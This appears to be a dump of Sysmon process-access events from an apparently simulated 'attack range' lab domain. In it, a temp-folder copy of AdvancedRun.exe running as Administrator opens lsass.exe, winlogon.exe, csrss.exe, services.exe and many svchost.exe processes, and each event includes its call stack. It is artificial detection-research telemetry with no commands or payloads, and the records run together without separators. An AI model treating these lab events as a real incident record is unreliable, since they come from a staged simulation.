20:16:15.194{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077155Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.194{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.194{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004077148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.193{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.192{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077144Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077143Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077142Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077140Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077139Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 